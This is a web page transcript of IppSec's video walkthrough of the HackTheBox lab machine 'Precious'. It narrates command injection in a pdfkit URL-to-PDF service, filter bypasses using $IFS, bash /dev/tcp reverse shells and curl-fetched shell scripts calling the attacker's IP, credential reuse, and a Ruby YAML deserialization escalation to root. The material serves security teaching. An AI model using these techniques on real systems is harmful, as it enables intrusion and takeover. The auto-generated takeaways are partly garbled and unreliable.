HackTheBox - Precious

IppSec · Beginner ·🔐 Cybersecurity ·3y ago

Key Takeaways

The video demonstrates how to hack the HackTheBox machine 'Precious' using command injection, deserialization vulnerability, and reverse shell techniques, with tools such as Burp Suite, netcat, and Ruby.

Full Transcript

what's going on YouTube this is ipsec I'm doing precious from hack the box which is an easy box as long as you're good about going online when you get stuck and doing some research to get yourself unstuck and I know that sounds easy but the initial foothold is just a web page that will take um a URL and convert that URL to a PDF now the command injection is Trivial to find but there's a lot of weird things around the command injection that you just will have a lot of trouble with for example spaces don't work that well in command injection we'll dig in and get it working but it's just weird right so if you don't figure out the trick which is putting a space beforehand and making sure that space is double URL encoded you'll have a lot of trouble trying to run any useful commands out of the command injection and then the prevask is a deserialization in Ruby if you don't do a lot of research you may be running some deserialization exploits that don't work with your version of Ruby and if you just did that little bit and got the correct one it just works right away so with that being said let's jump in as always I'm going to start with it and Maps the dash SC for default scripts as V enumerate versions oh a output or formats playing the end map directory and call it precious then the IP address of 10 10 11 189 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's a Debian server we also have nginx on Port 80. its version is 1.18 and it's redirecting us to precious.htb so we could go to 10 10 11 189 we see it changes to precious.htb so we should just add this into our host file so I'm going to copy this then we can do pseudo V at C host and then 10 10 11 189 put in the hostname refresh the page and we get a um I guess page it says convert web page to PDF and a URL to fetch so the first thing I'm going to do is try like file Etsy pass WD to see exactly what happens here and it wants us to provide a valid URL so we could provide our own server so 10 10 14 8 is my IP address we should listen on Port 80 so sudo NC ovnp 80 and then click submit and we see it connects right back to us the user agent is going to be Mozilla we do see a WK HTML to PDF and not much more information here one of the things I always test for is just like command injection so a simple way to do this would be setting up the netcat again we don't even have to go and burp suite at this point we could just try like a dollar um I'll do who am I right so if it just gets HTTP we don't really have command ejection if it gives us the dollar who am I we definitely don't if it gives us a username we would right so if I click submit here we can see we got slash Ruby so we definitely have command injection the next thing to do would be try like a reverse shell and I'm going to right now make a directory www go in here and I'm going to start a python server on Port 80. um let's see python3 I forgot the dash m for module and the reason why I'm doing that is just so I can um have multiple requests going and I can just see the URL easily if I just did through the netcat it just floods the screen right I could use the dash K to keep open but it puts like seven or eight lines per request and that's just messy right so I'm gonna do nclvnp 9001 and we're going to try this again so HTTP then we can do bash Dash C then a single quote bash Dash I Dev TCP 10 10 14 8 900010 and one like this and that's terminated click on submit we see a get but we don't have a shell and we get the PDF if I open the PDF it's just giving us the output of our web server so we can now send this over to burp Suite let's make sure oh I'm not even I don't have a tweet open so let's open it up and once it's open we'll just send it there and the reason why I'm doing this is just so I have full control over like URL encoding and things like that also it's a bit easier to um send the request multiple times instead of using the web page every time and having the text box right then of course burp Suite decides to open right when I want to do this so while it goes let's see it's being a pain I'm just going to well I was going to pause the video and continue but as soon as I said that rip Suite behaved and we are now open so I can go into the repeater tab after proxy is set to intercept there we go submit it send this over to repeater and it's you're all encoding the whole thing that is good so we'll just do control U send it confirm the same behavior I'm going to get rid of a reverse shell or do you name send it and we see it's slash Linux right um if I did who am I that's what was Ruby so I'm going to try maybe finding a bad character let's do you name Dash a so if I send this we get a PDF and well did we get a PDF yeah we did and um we don't have the youname output if I just do you name without the dash a it gives us a web server that says cannot load remote URL and it doesn't get on Linux I'm guessing that's because this is a 404 so I'm going to go NW real quick I'm going to touch Linux so it's not a 404. I'm going to refresh this page and we still cannot load remote URL I'm not sure exactly why that is but that is what it's saying who am I cannot load we get Ruby so we want to try to figure out a space in Linux we can do like uh I guess it's bracket expansion so like you name comma Dash a if it's in squigglys um will work as a space so we can try that so we can put this and then Dash a and we still don't have anything it's just get slash the other thing I could be thinking maybe um it's not a valid parameter so I do like a slash question mark Q is equal to this and we just see that so we don't really have that much to go on um let's see maybe dollar ifs like this could be another way we could do space I think I'm not positive on this one nothing here oh there we go so ifs actually worked I did not expect that but if we use ifs and ifs I think defaults to um space we can replace that and let's just keep going down this path and see if we can get a reverse shell this way so I'm going to do bash then let's just do the bash dial real quick uh bash Dash C 10 10 or bash Dash I have TCP 10 10 14 8 0 and 1 like that so I think this is a good reverse Shell let's just copy and paste it to make sure let's see bash Dash I Dev TCP I forgot the port 9001 that is why we test things right so reverse shell works so what we want to do is replace all the spaces with IFS so I'm going to do Echo put it in double quotes said space dollar IFS and I wonder if I'm going to have to um escape the dollar nope that looks like it worked so let's copy and paste this in and see if it works so we have the shell running I've got to have the Z there and it doesn't look like that works um another thing we could do let's say if we can Echo ifs test do we get test we did not how did that u-name work I am now actually baffled at what happened so we do you name we get Linux dollar ifs Dash a we get the full thing but if I do Echo ifs please oh because the dash I guess is killing the variable that is a weird Edge case percent 20 please let's see that doesn't work it only can do that nope let's see I'm trying to think of another way we could do this because what we want is I wonder if we URL encode this um let's see right click convert selection HTML or URL all characters 7B so by b7c 7D do we get please we don't so it's something with that Dash I'm trying to think if there's an easy way we can get this working but I can't think of it off the top of my head um because I want to do like a base64 encode but um I this will get invalid input right and I don't know how else I can terminate this IFS variable so let us now go back here and we'll get a PDF so let's just disable burp Suite submit this let's see I'm going to refresh the page HTTP 10 10 14 8 submit save the file and how'd it save it is 48k so we'll CP we'll move from downloads for AK and then if we do an exif tool against it we can see it's generated by PDF kit version uh zero eight six so if we went to Google and find a proof of concept there is this vulnerability on sneak and if we look at it it's talking pretty similar to what we did except the putting a space before the command and also I don't know exactly what the dollar uh bracket is doing but I think the space was the key part um they're also just using backticks um we did not use backtx we used the dollar but I think both of those are just fine so let's try the Sleep Command right so if we paste this in we probably want to I would guess put a percent 20 here see that's your own code already I don't know what I just did I don't know where that fq came from but it worked oh um I URL encoded the question mark so that's leaping for five seconds and the request takes a second so if I do sleep two we should see like 2.9 I would guess or three that is good so we had to URL encode this so now let's try our reverse shell so bash Dash C bash Dash I Dev TCP 10 10 14 8 9001 zero and one like that put this in it's hanging and if I go back we have a shell what's going on YouTube this is IP from the future and that whole ifs trick I found that live in the recording so it may have been a little bit more confusing I still don't know exactly what's going on in this exploit but I do kind of just want to show it because there's some really cool Behavior with this thing and if you're trying to find things blind maybe this can uh help you so to revisit we have command injection right here if we do who am I we can see Ruby right and the really weird behavior in this is when it comes to spaces so we do you name it's going to say Linux that is fine with us but if we do Dash a uh we just get nothing if we um let's see if we do a percent 20 here we still just get the percent 20 it doesn't go on to say Linux right but if we double your your double URL encode this so present to 520. now we can have spaces and this is where we went to and uh got sleep and everything working right but let's say this little space trick did not work where would we go from that right and that's why I showed the ifs and this also works we see Linux here it's not beginning with a space like it does here and this is good until you realize there's a lot of um non-special characters we want to put after ifs right because this is working because of the hyphen here this is terminating it because it's I guess not a valid thing for the variable name so if I did Echo and we do please subscribe here we don't get Please Subscribe and that's because this variable is no longer just ifs it is ifs please subscribe so if we did a character that's not valid for the variable like the dash then it's going to say Dash Please Subscribe now that's annoying because we don't always want to put a dash here and then after recording the video I figured we could fix this well during the video I guess we tried putting it in Brackets and that doesn't work I talked to oxdf he was like maybe it's a templating language you gotta Escape it and the way you do that normally is through uh double brackets you can potentially do it through um backslashes so we could try that I'm just going to do a few of these to show it doesn't work and I don't think it does um but I don't think ifs would work when I was recording this video for the first time because I only tried the brace expansion with squigglies and commas right so this is just me doing my due diligence and showing all the behavior so these are the things that we try right we just send it a lot and look and we always get nothing so it doesn't have to do with escapes well what we could do is kind of what this ifs trick is by default this is I think called internal field separator if I remember correctly and by default that's going to be a space so that's why this works well what if we just did a junk variable like this what happens we get Please Subscribe and there's no dash right because the dollar sign is also an invalid variable thing so by saying dollar ifs we get the space and then we just give it a junk variable that doesn't exist so like dollar hyphen and The Hyphen gets trashed this gets treated as null and just goes to please subscribe so now that we know this trick we can write a curl right so we could do curl then ifs and we want Dash o to write to an out file then we can say Dev shm we'll call it shell.sh and then oh so after oh we probably want another ifs here and I'm guessing we're safe to do this because slash is not a um valid thing so I'm going to try writing to shell.sh and then we do a dollar ifs and now we want to put the URL and if we just started with HTTP that's going to get treated as a variable so I'm going to put a dollar hyphen and we can say 10 10 14 8 slash woot so let's make sure this file exists so I'm going to V root and we'll do bin Bash bash Dash I Dev TCP 10 10 14 8 9001 zero and one like this okay Sage mod plus X root well we didn't even need to make the executable because that's going to be going to the server so if I run this we see it does a get on woot so I think my curl command ran so I am listening on 9001 so what if I now just do a bash I'm going to do it in a new repeater window and we'll say um Bash ifs Dev shm shell.sh run it it's hanging and we get a shell so that's how we could have done it without um putting that space beforehand so hopefully you enjoyed that I think this ifs trick is super versatile um the reason why we didn't do the like bash one liner like bash Dash C bash Dash I thing is that has a lot of special characters that'd be a pain to deal with here um outside of recording I did chest pipes and the pipes don't lead to um command execution it just prints it in the output so that's why we're not using pipes either this is the best way to do it in two requests just download the file and execute it so with that being said let's just get back to the video where we have a shell as Ruby and we are the Ruby user and we're in this PDF app so I'm gonna do python3-c import PTY PTY spawn Ben Bash fix that typo Ctrl Z stty raw minus Echo foreground hit enter twice so now we have the up arrows and stuff so in this file we do have a config config is a directory if we go in it there is environment and we can look at how this is and we don't see anything sensitive here right there is config.ru let's just run PDF controllers so nothing sensitive there if we do find dot dash type f I'm going to export term is equal to X term so I can clear the screen rerun that find command and it doesn't look like there's going to be any sensitive files I was looking for if it like connected to a database or something like that I'm going to go in my home directory and we're going to run OS and we don't see anything here we do find dot dash type f here we can see there is a bundle and config so let's try cutting this file so cat copy paste and we see um it's going to rubygems.org and it has credentials Henry and this password so if I cat Etsy past WD we do have Henry as a user on this system so why don't we just try and ssh in so I'm going to get rid of this web server since we don't need it anymore let's cat the same thing we did copy whoops I did paste again copy SSH Henry at precious whoops precious.htb yes paste it in the password Mission denied that is not worth expecting to paste Ctrl shift insert was the password and now we're logged in as Henry if you do it lsla we just have the user.txt and not much here we can do a sudo-l and I always check sudo whenever I have a credential just because sometimes sudo asks you for a password and you know it here right if I tried it on here first it wants me to put the password for the Ruby user don't know it so I can't view the list right so that's why sudo isn't normally my first go-to if I don't have the user's password already because I don't want to run it and get the password wrong because that creates more audit events if you run it have the password right the first time um it's much less suspicious right so looking at sudo we do see we can do user bin Ruby on opt update dependencies.rb so if we look at this file actually I'm going to Vim it so we have syntax highlighting and of course Vim isn't installed so let's look at it we're requiring yaml uh then requiring ruby gems um update we load a file um gem specification looking at this it's not really doing anything I don't know where any type of user input or things like that can happen um it is doing require yaml so my first thought is um maybe if I create like a um yamo.rb file or are you I don't know what the extension of Ruby was um if we went back up here let's see where's that find when we're in this directory um I think it's RB right yeah pdf.rb so if we do lsla uh we can touch um we'll do tests real quick permission died so we can't um touch files in this directory we can do a sudo-l see how we run it and we can go to Dev shm run this command and it wants us to have a dependencies.yaml file so I'm going to copy the opt sample dependencies yaml into Dev shm run it again and it's telling us what we'd expect right so if I cat the opt dependencies I'm going to try touching whoops touch emo.rb re-run it and if it errors it tried to load the yaml Ruby library from my current working directory which it did not do so that's not it um the other thing we could do is Google so Ruby yaml DC aerialization and one of the first um first is a blind remote code execution through emo deserialization and essentially um it says when doing a yaml thing in Ruby you shouldn't just blindly accept user input and here let's see they're doing a sleep for 10 minutes I believe right here so let's cat uh grab this yaml file V dependencies um my show is dead that is weird is my Showdown here let's see I'm going to restart my VPN there we go um not sure exactly what happened there so let's paste in this I'm going to undo it set my mode to paste paste it in just because it looked a little funny to me but maybe not um just get set I'm just gonna run ID real quick so now I'm going to do my sudo command and mapping values are not allowed in this context so that doesn't look like it worked um here it's doing a um request to collaborator now it's sending a reverse shell I'm going to try maybe a different payload I always like going to payload all the things when I see a reference to it it's generally documented pretty well we can see there's a universal gadget for Ruby before 272 so let's take a look at my Ruby version where 274 so I'm not going to use this one this is for two to three and this looks very similar to what I just did the oh did some cleanup script delete my dependencies be dependencies.yaml that is annoying is that paste paste this in let's run sudo again we got another error but if we go up to the top we see it running the command we have the output of ID so let us go back into dependencies and I'm just going to put a reverse shell here so bash Dash I Dev TCP 10 10 14 8 9001 0 and 1 like this and let's see and see ovmp 9001 rerun sudo and there we are we are root at precious so I can go to slash root and we can get the flag so um that was the Box a nice simple easy box hope you guys enjoyed it take care and I will see you all next week

Original Description

00:00 - Introduction 01:00 - Start of nmap 02:00 - Checking out the web page and finding command injection in the URL 03:20 - Space appears to be a bad character with command injection. Normal tricks like brace expansion or IFS don't work. 07:20 - Trying IFS to be a space but the trailing character makes it difficult 12:00 - Taking a step back from the RCE, downloading the PDF to examine metadata and discovering it was made with pdfkit 0.8.6, which has public POC's against it 13:00 - The POC puts a space before the exploit which then removes the space being a bad character in our exploit 14:29 - Beyond Root/Edit: Using $- to terminate the $IFS, allowing us to bypass the need to prepend the space 20:30 - End of edit, shell as ruby, discovering credentials in a config file for henry 22:53 - Henry can run sudo, discover he can execute a ruby script 25:50 - Looking up a ruby deserialization exploit with YAML 27:35 - Finding a different payload and getting a root shell
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

The video teaches how to hack the HackTheBox machine 'Precious' using command injection, deserialization vulnerability, and reverse shell techniques. It covers tools such as Burp Suite, netcat, and Ruby, and concepts such as templating language, URL encoding, and shell scripting.

Key Takeaways
  1. Map the dash SC for default scripts
  2. Add precious.htb to the host file
  3. Provide a valid URL to the web page to convert it to PDF
  4. Set up a netcat listener on port 80
  5. Test for command injection by sending a simple command
  6. Use Burp Suite to intercept and analyze requests
  7. Replace spaces with URL encoded characters
  8. Use IFS to replace spaces in a URL
  9. Find a reverse shell using a TCP connection
💡 The video highlights the importance of using URL encoding to bypass restrictions and exploiting deserialization vulnerabilities to gain root access on the system.

Related Reads

📰
Why Learning Networking Made Cybersecurity Much Easier for Me
Learning networking fundamentals simplifies cybersecurity by providing a solid understanding of network architecture and protocols
Dev.to · Qnayds Career
📰
10 Cybersecurity Mistakes SaaS Startups Make (and How to Fix Them)
Learn the top 10 cybersecurity mistakes SaaS startups make and how to fix them to avoid legal and financial repercussions
Medium · Cybersecurity
📰
Your Disaster Recovery Plan Is Missing One Critical Thing
Learn how to enhance your disaster recovery plan by identifying a critical missing component and take action to ensure business continuity
Dev.to · Srija
📰
Cross-Site Request Forgery (CSRF): Kullanıcının Haberi Olmadan Yapılan Saldırılar
Learn about Cross-Site Request Forgery (CSRF) attacks, where an attacker tricks a user into performing unintended actions on a web application, and why it matters for web security
Medium · Cybersecurity

Chapters (12)

Introduction
1:00 Start of nmap
2:00 Checking out the web page and finding command injection in the URL
3:20 Space appears to be a bad character with command injection. Normal tricks like
7:20 Trying IFS to be a space but the trailing character makes it difficult
12:00 Taking a step back from the RCE, downloading the PDF to examine metadata and d
13:00 The POC puts a space before the exploit which then removes the space being a b
14:29 Beyond Root/Edit: Using $- to terminate the $IFS, allowing us to bypass the ne
20:30 End of edit, shell as ruby, discovering credentials in a config file for henry
22:53 Henry can run sudo, discover he can execute a ruby script
25:50 Looking up a ruby deserialization exploit with YAML
27:35 Finding a different payload and getting a root shell
Up next
Cryptography Explained Visually — Watch AES, RSA, TLS & More Work Step by Step
Zariga Tongy
Watch →